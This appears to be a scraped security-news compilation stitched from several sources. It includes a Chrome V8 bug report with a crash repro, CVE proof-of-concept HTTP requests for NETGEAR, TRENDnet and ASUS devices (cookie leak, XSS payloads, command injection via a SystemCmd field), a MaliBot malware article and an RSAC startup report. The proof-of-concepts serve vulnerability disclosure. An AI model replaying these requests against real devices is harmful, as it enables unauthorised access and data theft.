The most important and interesting computer security stories from the last week.
The post A week in security (June 13 – June 19) appeared first on Malwarebytes Labs.

**RELATED ARTICLES**

June 13, 2022 - We take a look at the latest batch of vulnerabilities in Chrome requiring an update.

May 30, 2022 - Posts from the last week on Malwarebytes Labs describing all the latest news, exploits, scams, and more.

May 26, 2022 - ChromeLoader is working its way into Chrome browsers via ISO images claiming to offer cracked games. What are the dangers?

May 25, 2022 - Google has issued an update for the Chrome browser to patch 32 security issues . One of the vulnerabilities is rated as critical, so install that update as soon as you can.

May 17, 2022 - A little-used feature of web addresses is being used to obfuscate malicious phishing URLs.

A week in security (June 13 – June 19)

Chrome suffers from having an incomplete fix for CVE-2022-1096.

    Chrome: Incomplete fix for CVE-2022-1096VULNERABILITY DETAILSThe fix for https://crbug.com/1309225 has modified `SetPropertyInternal()` to fall back to `SetSuperProperty()` whenever a property access interceptor is encountered because `SetSuperProperty()` is robust against possible side effects caused by interceptors.Unfortunately, the function `JSObject::DefineOwnPropertyIgnoreAttributes()` is also affected by the bug and requires the same change.VERSIONGoogle Chrome 100.0.4896.60 (Official Build) (arm64)Chromium 102.0.4972.0 (Developer Build) (64-bit)REPRODUCTION CASETo make the exploit functional again, the attacker only needs to replace one property store with an `Object.defineProperty()` call:```<script>style = document.createElement('p').style;Object.defineProperty(style, 'prop', {  value: { toString() { style.prop = 1 } }});</script>```The repro case above triggers the same DCHECK failure:```## Fatal error in ../../v8/src/objects/map.cc, line 437# Debug check failed: map->instance_descriptors(isolate) .Search(*name, map->NumberOfOwnDescriptors()) .is_not_found().#```CREDIT INFORMATIONSergei Glazunov of Google Project ZeroThis bug is subject to a 90-day disclosure deadline. If a fix for thisissue is made available to users before the end of the 90-day deadline,this bug report will become public 30 days after the fix was madeavailable. Otherwise, this bug report will become public at the deadline.The scheduled deadline is 2022-06-28.Related CVE Numbers: CVE-2022-1232,CVE-2022-1096.Found by: glazunov@google.com

Chrome CVE-2022-1096 Incomplete Fix

Chrome suffers from a missing bounds check in WebGPUDecoderImpl::DoRequestDevice.

Chrome WebGPUDecoderImpl::DoRequestDevice Missing Bounds Check

netgear wnap320 router WNAP320_V2.0.3_firmware is vulnerable to Incorrect Access Control via /recreate.php, which can leak all users cookies.

Permalink

Cannot retrieve contributors at this time

There is an unauthorized vulnerability in wnap320, located in /recreate.php, which can leak all users' cookie

**http://ip/recreate.php**

    
    
    WNAP320_V2.0.3_firmware
    
    GET /recreate.php?username=admin 
    HTTP/1.1 Host: 192.168.0.100 
    Accept: text/javascript, text/html, application/xml, text/xml, / 
    X-Prototype-Version: 1.6.0.2 
    X-Requested-With: XMLHttpRequest 
    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36
    Referer: http://192.168.0.100/index.php?page=master 
    Accept-Encoding: gzip, deflate 
    Accept-Language: en-US,en;q=0.9 
    Connection: close
    

**Acknowledgement**

Thanks to the partners who discovered the vulnerability together：

Yi-fei Gao

CVE-2022-31876: uai-poc/unauth.md at main · jayus0821/uai-poc

Trendnet IP-110wn camera fw_tv-ip110wn_v2(1.2.2.68) has an xss vulnerability via the proname parameter in /admin/scheprofile.cgi

Permalink

There is an xss vulnerability in ip110wn, the vulnerability point is located in the proname parameter in /admin/scheprofile.cgi

**http://ip/admin/scheprofile.cgi**

    
    
    fw_tv-ip110wn_v2(1.2.2.68)
    
    POST /admin/scheprofile.cgi 
    HTTP/1.1 Host: 192.168.73.129 
    Content-Length: 112 Cache-Control: max-age=0 
    Authorization: Basic YWRtaW46YWRtaW4= 
    Upgrade-Insecure-Requests: 1 
    Origin: http://192.168.73.129 
    Content-Type: application/x-www-form-urlencoded 
    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 
    Referer: http://192.168.73.129/admin/scheprofile.asp?en 
    Accept-Encoding: gzip, deflate 
    Accept-Language: en-US,en;q=0.9 
    Connection: close
    
    mode=add&maxkey=&proname=");alert("123&name=&weekdays=radiobutton&weekday=&start_hr=&start_min=&end_hr=&end_min=
    

**Acknowledgement**

Thanks to the partners who discovered the vulnerability together：

Yi-fei Gao

CVE-2022-31875: uai-poc/xss1.md at main · jayus0821/uai-poc

ASUS RT-N53 3.0.0.4.376.3754 has a command injection vulnerability in the SystemCmd parameter of the apply.cgi interface.

Permalink

Cannot retrieve contributors at this time

There is a command injection vulnerability in the SystemCmd parameter of the apply.cgi interface in RT-N53

**http://ip/apply.cgi**

    
    
    RT-N53 (Version 3.0.0.4.376.3754)
    
    GET /apply.cgi?current_page=Main_WOL_Content.asp&next_page=Main_WOL_Content.asp&group_id=&modified=0&action_mode=+Refresh+&action_script=&action_wait=&first_time=&preferred_lang=EN&SystemCmd=ether-wake+-i+br0+whoami&firmver=3.0.0.4&destIP=ccccc&wollist_deviceName=&wollist_macAddr= HTTP/1.1 
    Host: 192.168.1.1 
    Authorization: Basic YWRtaW46YWRtaW4= 
    Upgrade-Insecure-Requests: 1 
    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 
    Referer: http://192.168.1.1/Main_WOL_Content.asp 
    Accept-Encoding: gzip, deflate 
    Accept-Language: en-US,en;q=0.9 
    Cookie: clock_type=1; hwaddr=52:54:00:12:34:57; bw_24refresh=1; ymd=2; bw_rtab=WIRELESS1 
    Connection: close
    

**Acknowledgement**

Thanks to the partners who discovered the vulnerability together：

Yi-fei Gao

CVE-2022-31874: uai-poc/command injection.md at main · jayus0821/uai-poc

Trendnet IP-110wn camera fw_tv-ip110wn_v2(1.2.2.68) has an XSS vulnerability via the prefix parameter in /admin/general.cgi.

Permalink

There is an xss vulnerability in ip110wn, the vulnerability point is located in the prefix parameter in /admin/general.cgi

**http://ip/admin/general.cgi**

    
    
    fw_tv-ip110wn_v2(1.2.2.68)
    
    POST /admin/general.cgi
    HTTP/1.1 Host: 192.168.73.129 
    Content-Length: 112 Cache-Control: max-age=0 
    Authorization: Basic YWRtaW46YWRtaW4= 
    Upgrade-Insecure-Requests: 1 
    Origin: http://192.168.73.129 
    Content-Type: application/x-www-form-urlencoded 
    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 
    Referer: http://192.168.73.129/admin/scheprofile.asp?en 
    Accept-Encoding: gzip, deflate 
    Accept-Language: en-US,en;q=0.9 
    Connection: close
    
    prefix=123"><script>alert(123)</script><a&duration=20&gpioduration=20
    

**Acknowledgement**

Thanks to the partners who discovered the vulnerability together：

Yi-fei Gao

CVE-2022-31873: uai-poc/xss2.md at main · jayus0821/uai-poc

Parse Server is an open source backend that can be deployed to any infrastructure that can run Node.js. Prior to versions 4.10.11 and 5.2.2, the certificate in the Parse Server Apple Game Center auth adapter not validated. As a result, authentication could potentially be bypassed by making a fake certificate accessible via certain Apple domains and providing the URL to that certificate in an authData object. Versions 4.0.11 and 5.2.2 prevent this by introducing a new `rootCertificateUrl` property to the Parse Server Apple Game Center auth adapter which takes the URL to the root certificate of Apple's Game Center authentication certificate. If no value is set, the `rootCertificateUrl` property defaults to the URL of the current root certificate as of May 27, 2022. Keep in mind that the root certificate can change at any time and that it is the developer's responsibility to keep the root certificate URL up-to-date when using the Parse Server Apple Game Center auth adapter. There are no known workarounds for this issue.

CVE-2022-31083: Latest News - Apple Developer

By Deeba Ahmed
MaliBot Android Malware is also capable of bypassing 2FA (Two-factor authentication). F5 Labs researchers have discovered a new…
This is a post from HackRead.com Read the original post: New MaliBot Android Malware Found Stealing Personal, Banking Data

****MaliBot Android Malware is also capable of bypassing 2FA (Two-factor authentication).****

F5 Labs researchers have discovered a new Android malware family that can exfiltrate personal and financial data after compromising devices. According to researchers, the malware can not only bypass multi-factor authentication processes, but can also steal banking data, passwords, and cryptocurrency wallets.

It is worth noting that the malware is distributed through fraudulent websites and tricks victims into downloading it, thinking it is a popular cryptocurrency tracking app. It is also distributed through smishing.

Furthermore, researchers have identified two malicious sites distributing MaliBot. One of them is a fake version of TheCryptoApp that boasts over a million downloads on the Google Play Store.

**Details of MaliBot**

F5 Labs has dubbed the Android malware MaliBot. This powerful malware disguised as a cryptocurrency mining application may pretend to be another app or a Chrome browser. It asks the user for accessibility and launcher permissions when downloaded to monitor the device and carry out its malicious operations.

MaliBot uses a Virtual Network Computing (VNC) server implementation to gain control of the infected devices. Once it infects a device, it starts exfiltrating financial data and steals PII (personally identifiable information) and cryptocurrency wallet information.

Research revealed that the malware’s C2 server is based in Russia and the servers are the same that were previously used for distributing the Sality malware. From June 2020, the IP was used to launch different malware campaigns.

**MaliBot Capabilities**

MaliBot has diverse capabilities, such as it supports web injections and can be used in overlay attacks. It can run and delete applications and steal sensitive data such as MFA codes, cookies, SMS messages, etc.

It can remotely steal passwords and access text messages, crypto wallet information, web browser cookies, bank details, and capture screenshots from compromised devices. It can also bypass MFA protection.

It mainly abuses the Android Accessibility API that lets it perform specific actions without asking for user permission or interaction and maintain persistence on the infected device. It also bypasses 2FA processes by validating Google prompts via the Accessibility API and steals 2FA codes, which are later transferred to the attacker.

When distributed via SMS messages, the malware can log exceptions and registers itself as a launcher. Bypassing protections around crypto wallets lets the attackers steal bitcoins and other cryptocurrencies from the victim’s wallet linked to the infected device.

Lastly, like FluBot, MaliBot can send SMS messages to other users to spread the infection chain. Currently, this campaign is targeting Spanish and Italian bank customers, but the scope of infection may soon broaden, F5 Labs researcher Dor Nizar noted.

**More Android Malware News**

*   Authorities Take Down SMS-based FluBot Android Spyware
*   Predator Spyware Using Zero-day to Target Android Devices
*   Ginp Android trojan targets banking apps & threaten 2FA/SMS
*   HiddenMiner Android Monero Mining Malware Cause Device Failure
*   New Android banking malware Xenomorph found in Play Store apps

New MaliBot Android Malware Found Stealing Personal, Banking Data

A secure Web browser takes the top prize, and for the second year in a row malware detection is an afterthought.

**RSA CONFERENCE 2022 –** RSAC's Innovation Sandbox is a _Shark Tank_\-like competition, bringing 10 startup finalists to present onstage before judges.

Talon Security seized the first-place prize with a bold vision for the corporate Web browser of the future. For those thinking the browser is too competitive a market to take on, Talon's pitch makes intriguing arguments.

Deploying any kind of traditional security controls or software across operating systems, and into third-party contractors or personal devices, is logistically difficult or impossible. Yet Web browsers can be deployed by any user without admin privileges. In 2019, Microsoft consolidated under Google's open source Chromium code base, so Talon's Chromium browser should enjoy broad device and Web compatibility.

After requiring users to have Talon's browser to access their clouds, corporations then gain centralized management to control access levels. Talon ensures privileged data stays contained within the browser, as it can block saving, screen capture, or cut and paste.

Talon is not the only startup stretching our understanding of security's future. With these nine other innovative finalists, three trends have emerged.

**Core Security Still Being Reimagined**

Many of these entrepreneurs proposed bold visions for reimagining cloud security. Zero trust has been a popular approach, centralizing continuous authorization, device attestation, and taking the least-privilege approach in the cloud. Sharon Goldberg, CEO of the second-place finisher, BastionZero, takes issue with even calling today's solutions zero trust, "when really they create a single point of compromise."

BastionZero's founders came out of the cryptography world, where decentralized encryption, such as that in Bitcoin, and Transport Layer Security (TLS) are common. BastionZero enables engineers and build processes to authenticate to the cloud using multiple roots of trust. With this differentiator, if one root is compromised, organizations still maintain control.

Attack surface management company SevCo is the brainchild of JJ Guy and Greg Fitzgerald, the founders of Carbon Black and Cylance, respectively. Attempts at device inventories have always been an industry failure, and the problem has become worse with our remote and rapidly churning workforce.

SevCo's real-time streaming platform continuously correlates inventory from many sources through APIs. They record suspicious changes over time and are expecting to tame the problem of unmanaged and malicious devices reaching into clouds.

**Risk Management for Data, Privacy, and DevOps**

Unlike past years at Innovation Sandbox, the majority of 2022 finalists sell to users who do not report to the CISO. Talon's Web browser, SevCo's IT inventory, and BastionZero's authentication are more likely to fall under the CIO. Judges are surely sensitive to the demand for securing post-cloud IT infrastructure and defending digitization across organizations.

Another trio of startups in the competition emphasized working across these departments. Dasera frees data security that's been siloed within data, IT, and privacy teams. It visualizes data context, automates workflows, and coordinates policy and actions. Dasera ends up being a single pane of glass to visualize and manage data security across multiple departments and throughout its life cycle.

Torq is using a no-code approach that's seen recent success in automating cloud operations. It allows security professionals to visually build automation without the help of programmers, reducing costs. In addition to automating incident response, Torq can seamlessly coordinate with IT on the growing backlog of account provisioning, caused by identity attacks.

SecDevOps startup Cycode reaches across the organization to defend DevOps' entire pipeline: from application code to open source libraries and deployment paths. Cycode also automates remediation workflows to reduce costs.

**Cloud Security Focuses on APIs, Over-Permissioning**

Malware is still big on endpoints but receives less emphasis in cloud security. It's difficult for hackers to ensure their malware runs in the cloud near the data they target, especially with technologies like "serverless" containers and lambda functions. From what we know today, hackers are more likely to make API calls into or across the cloud, often sitting at their own devices behind anonymized IPs.

The cloud's crown jewels are applications and APIs that are exposed to the outside by design, said Neosec founder Giora Engel. Attackers can access them directly with credentials — whether legitimate or stolen. Hence the cloud security adage, "Hackers don’t break in, they log in." Neosec leverages API gateways, like Google Apigee. It discovers an organization's APIs, detects their vulnerabilities, and monitors use and abuse. Neosec wields behavioral analytics and offers a managed detection and response service on top.

Lightspin also doesn't focus on malware detection but manages cloud posture and protects workloads through a unique graph technology. Less-experienced analysts can visualize the most critical attack paths where vulnerabilities and configurations need closing. It's one of the easier products to use in its space.

Meanwhile, Cado Security brings forensics and incident response to cloud workloads. Instead of placing agents inside these workloads, Cado obtains cloned images of their disk, memory, and surrounding logfiles. Since offline forensic analysis has zero impact on high-availability workloads, cloud forensics has exciting potential.

Cado is one of the few examining binary files and processes inside workloads. It doesn't tout specific malware detection, yet allows searching for malware indicators and visualizing timelines.

Araali Networks is bucking the trend and places agents into the private cloud, leveraging Kubernetes DaemonSets and Linux's extended Berkeley Packet Filter (eBPF). Araali examines network traffic, enforces policies, and blocks malicious code.

Innovation Sandbox 2022 was a barometer for the rapid industry changes that are underway to secure the cloud. Cybersecurity must defend digitization across IT, data, privacy, and DevOps. It's a different world, where threats are a lot bigger than just malware.

Tag

#chrome